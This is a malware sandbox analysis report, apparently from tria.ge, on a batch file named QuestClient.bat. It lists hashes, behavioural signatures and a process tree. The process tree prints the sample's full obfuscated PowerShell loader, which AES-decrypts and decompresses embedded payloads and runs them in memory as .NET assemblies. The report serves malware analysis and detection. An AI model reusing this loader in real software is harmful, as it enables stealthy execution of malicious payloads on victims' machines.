Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
14/08/2024, 17:48
Static task
static1
Behavioral task
behavioral1
Sample
QuestClient.bat
Resource
win7-20240708-en
4 signatures
150 seconds
General
-
Target
QuestClient.bat
-
Size
456KB
-
MD5
c2cd34623e825a5da3bd0c3c6a7cc7a0
-
SHA1
1ce81a2392bff443e04b97a9ff76e0316c1ca850
-
SHA256
70c57f82283c07c45bca13b478c4f03bb81387e1d4b3945fc3e6c2483e878bc8
-
SHA512
ba0895bee303d9ff1e268b7cc512bc903a12465b6737f21594107d040592f8210b83c26bae3c0f6d0b9a12fd98f8702305a4b3b409a6b63b15c9b2a8d0b34ecf
-
SSDEEP
12288:Ve9+GI3rpF00cj8PF4617iCV1sYJKyoS4osZcD48:Ve9vI3FqgmCRoLosWDD
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1904 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1904 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2328 3056 cmd.exe 31 PID 3056 wrote to memory of 2328 3056 cmd.exe 31 PID 3056 wrote to memory of 2328 3056 cmd.exe 31 PID 3056 wrote to memory of 1904 3056 cmd.exe 32 PID 3056 wrote to memory of 1904 3056 cmd.exe 32 PID 3056 wrote to memory of 1904 3056 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\QuestClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MqCXbwte9uhPYEg+s1sfkk76fVMEhUBYBUcawnYJBSM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JloX3aFz+GqYGWzFbTGvHw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Sniec=New-Object System.IO.MemoryStream(,$param_var); $ThfXY=New-Object System.IO.MemoryStream; $dRvPt=New-Object System.IO.Compression.GZipStream($Sniec, [IO.Compression.CompressionMode]::Decompress); $dRvPt.CopyTo($ThfXY); $dRvPt.Dispose(); $Sniec.Dispose(); $ThfXY.Dispose(); $ThfXY.ToArray();}function execute_function($param_var,$param2_var){ $yULDO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $pPFbC=$yULDO.EntryPoint; $pPFbC.Invoke($null, $param2_var);}$FirRg = 'C:\Users\Admin\AppData\Local\Temp\QuestClient.bat';$host.UI.RawUI.WindowTitle = $FirRg;$xKJqy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FirRg).Split([Environment]::NewLine);foreach ($nlfgl in $xKJqy) { if ($nlfgl.StartsWith('wycXuQhiigqSLUkYJLaD')) { $nKIZB=$nlfgl.Substring(20); break; }}$payloads_var=[string[]]$nKIZB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-